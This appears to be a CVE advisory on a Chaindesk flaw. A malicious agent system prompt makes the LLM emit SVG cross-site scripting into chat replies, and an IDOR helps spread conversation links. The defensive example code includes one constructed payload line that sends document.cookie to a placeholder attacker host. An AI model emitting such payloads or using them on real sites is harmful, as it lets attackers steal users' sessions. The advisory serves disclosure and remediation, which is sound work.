Chaindesk AI Agent Stored Cross-Site Scripting Vulnerability

Vulnerability information

Vulnerability name: Chaindesk AI Agent stored cross-site scripting vulnerability

Vulnerability identifiers:

  • CVE: CVE-2025-51859

Vulnerability type: Cross-site scripting (XSS)

Severity: High

Vulnerability description: Chaindesk is a web application for building AI agents, widely used by enterprises and individuals to create and manage AI-driven chat agents. The application's agent chat component contains a stored cross-site scripting (XSS) vulnerability. An attacker can create an AI agent whose system prompt instructs the underlying large language model (LLM) to embed a malicious script payload (for example, SVG-based XSS) in its chat responses, achieving arbitrary client-side script execution. When a user interacts with such a malicious agent, or opens a direct link to a conversation that contains the XSS payload, the script executes in the user's browser. Successful exploitation can lead to theft of sensitive information such as JWT session tokens, which in turn can lead to account hijacking. In addition, an insecure direct object reference (IDOR) in the conversation URL structure (https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID>) facilitates distribution of these malicious conversation links and may also allow unauthorized access to other users' chat sessions. The technical root cause is that the application fails to sanitize or encode untrusted content (the LLM's responses) before rendering it, and lacks sufficient access-control checks on conversation lookups. The impact is broad: any user of https://www.chaindesk.ai may be affected, particularly when communicating with a public malicious agent, where the user's cookies (containing the session and token) can be stolen.

Vendor: Chaindesk

Product: Chaindesk AI Agent

Source: https://github.com/Secsys-FDU/CVE-2025-51859

Type: CVE-2025:github search

Repository files

  • README.md
  • figure1.png
  • figure2.png

Source overview

CVE-2025-51859

Vulnerability description

Chaindesk, a web application for constructing AI Agents, is vulnerable to Stored Cross-Site Scripting (XSS) in its agent chat component. An attacker can achieve arbitrary client-side script execution by crafting an AI agent whose system prompt instructs the underlying Large Language Model (LLM) to embed malicious script payloads (e.g., SVG-based XSS) into its chat responses. When a user interacts with such a malicious agent, or accesses a direct link to a conversation containing an XSS payload, the script executes in the user’s browser. Successful exploitation can lead to the theft of sensitive information, such as JWT session tokens, potentially resulting in account hijacking. An Insecure Direct Object Reference (IDOR) vulnerability in the conversation URL structure (https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID>) facilitates the distribution of these malicious conversation links and may also pose a risk of unauthorized access to other chat sessions.

Attack Vectors

Chaindesk is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability within its AI agent chat functionality. This vulnerability impacts user interactions and conversation displays accessed via URLs such as https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID>.

The primary method for exploiting this XSS involves an attacker creating an AI agent with a crafted system prompt. This malicious prompt directs the integrated Large Language Model (LLM) to generate responses containing an embedded SVG XSS payload. Consequently, when a victim engages in a chat with this compromised agent, the payload is rendered by the victim's browser, leading to client-side script execution. This technique effectively uses the agent's configuration to store and deliver the XSS payload. The execution of arbitrary JavaScript in the victim's session allows the attacker to steal sensitive data, notably JWT tokens, which can then be used for account hijacking. Figure 1 shows the UI rendering after the user communicates with the malicious agent; it leaks the user's session and token.

Figure 1: XSS payload executing in the chat UI after the user talks to the malicious agent
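The rendering mistake behind this class of bug, and the corresponding fix, as an added example that is not Chaindesk's code. It assumes the chat UI converts the model's reply from markdown into HTML before display; the sample reply, the markdown subset, and the attacker.example host are all constructed for illustration.

```javascript
// Added example (not Chaindesk code). Assumption: the chat UI converts the
// model's reply from markdown into HTML before showing it.

// Constructed reply, of the kind an agent with a malicious system prompt
// could produce. attacker.example is a placeholder host.
const MALICIOUS_REPLY =
  'Sure, here is the answer **in bold** and an image: ' +
  '<svg onload="fetch(\'https://attacker.example/?c=\' + document.cookie)"></svg>';

// Vulnerable path: the reply is treated as trusted markup. Whatever the model
// wrote, including <svg onload=...>, becomes live DOM the moment the result is
// assigned to innerHTML (or passed to React's dangerouslySetInnerHTML).
function renderUnsafe(reply) {
  return reply.replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>');
}

// Hardened path: escape every HTML metacharacter first, so model text can only
// ever be text, and only then apply a small allowlist of markdown rules to the
// escaped string. No tag or attribute in the output originates from the model.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

function renderSafe(reply) {
  return escapeHtml(reply)
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/`([^`]+)`/g, '<code>$1</code>');
}

// Check: every tag in the rendered HTML must be one the renderer itself emits.
// Any other tag came from the model and is a finding.
const ALLOWED_TAGS = new Set(['<strong>', '</strong>', '<code>', '</code>']);
function onlyRendererTags(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.every((t) => ALLOWED_TAGS.has(t));
}
```

If the product needs richer HTML than this escaper allows, the correct replacement is a maintained sanitizer (for example DOMPurify configured to drop SVG and MathML) rather than a hand-written filter, backed by a Content-Security-Policy that blocks inline script. Independently of rendering, a session cookie marked HttpOnly is not readable through document.cookie, so the token theft described here also depends on that flag being absent.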

Furthermore, the application exhibits an Insecure Direct Object Reference (IDOR) vulnerability (also classifiable as Broken Access Control) in how conversation URLs are handled. The endpoint https://app.chaindesk.ai/agents/<agentID>?tab=chat&conversationId=<conversationID> relies primarily on the agentID and conversationID parameters to select the chat content to display, with apparently insufficient access-control checks. This IDOR allows an attacker to:

  a) Craft and distribute direct URLs pointing to conversations they control that contain an XSS payload (delivered through the LLM method described above, or potentially embedded some other way). When a victim opens such a URL, the XSS payload executes.

  b) Potentially access other users' conversations if valid agentID and conversationID combinations can be identified. The initial report indicates, however, that conversationID values may not be easily guessable, which limits broad unauthorized access to pre-existing, unrelated conversations. Nonetheless, the IDOR's utility in delivering XSS payloads to targeted victims remains a significant concern.

Figure 2 shows the proof of concept for the IDOR vulnerability.

Figure 2: IDOR proof of concept
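The access-control check that is missing from a lookup keyed only by agentID and conversationID, as an added example that is not Chaindesk's code. The in-memory store, the user and field names, and the ownership model (an agent's owner and a conversation's participant may read it, nobody else) are assumptions made for the illustration.

```javascript
// Added example (not Chaindesk code): object-level authorization for a
// conversation lookup keyed by agentID and conversationID, the URL shape the
// report describes. Store, user ids and field names are assumptions.

// Constructed data. mallory owns a public agent and has chatted with it so that
// conv-3 holds a payload; victor is an unrelated user who receives the link.
const AGENTS = {
  'agent-A': { ownerId: 'alice' },
  'agent-B': { ownerId: 'bob' },
  'agent-M': { ownerId: 'mallory' },
};
const CONVERSATIONS = {
  'conv-1': { agentId: 'agent-A', participantId: 'carol', messages: ['hello'] },
  'conv-2': { agentId: 'agent-B', participantId: 'dave', messages: ['secret'] },
  'conv-3': { agentId: 'agent-M', participantId: 'mallory',
              messages: ['<svg onload="/* constructed payload */"></svg>'] },
};

// Insecure lookup: anyone who supplies a valid conversationID gets the content.
// agentId is taken from the URL but never cross-checked, and the requester's
// identity plays no part. This is the behaviour an IDOR exploits.
function loadConversationInsecure(agentId, conversationId) {
  const conv = CONVERSATIONS[conversationId];
  return conv ? conv.messages : null;
}

// Hardened lookup. Authorization is decided server-side from the authenticated
// session (requesterId), never from URL parameters alone:
//   - the conversation must belong to the agent named in the URL,
//   - the requester must be that agent's owner or the conversation's participant.
// Both failures return null, so a caller cannot tell "does not exist" from
// "not yours" and learn which ids are valid.
function loadConversationSecure(requesterId, agentId, conversationId) {
  const conv = CONVERSATIONS[conversationId];
  const agent = AGENTS[agentId];
  if (!conv || !agent || conv.agentId !== agentId) return null;
  const isOwner = agent.ownerId === requesterId;
  const isParticipant = conv.participantId === requesterId;
  return isOwner || isParticipant ? conv.messages : null;
}
```

With the check in place, a link to conv-3 mailed to victor returns nothing, so the stored payload is never rendered in his session; the XSS itself still needs the output-encoding fix, since mallory's own view of the conversation is unaffected. High-entropy conversation identifiers, which the report notes may already be in use, are defence in depth and not a substitute for this check.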

Vulnerability affected

This vulnerability can affect any user of https://www.chaindesk.ai. A user's cookie (which contains the session and token) can be stolen when they communicate with a public malicious agent; because the injected script reads it from the browser, this also implies the cookie is not flagged HttpOnly.


http://example.com/2025/07/19/github_3075778459/
Author: lianccc
Published: July 19, 2025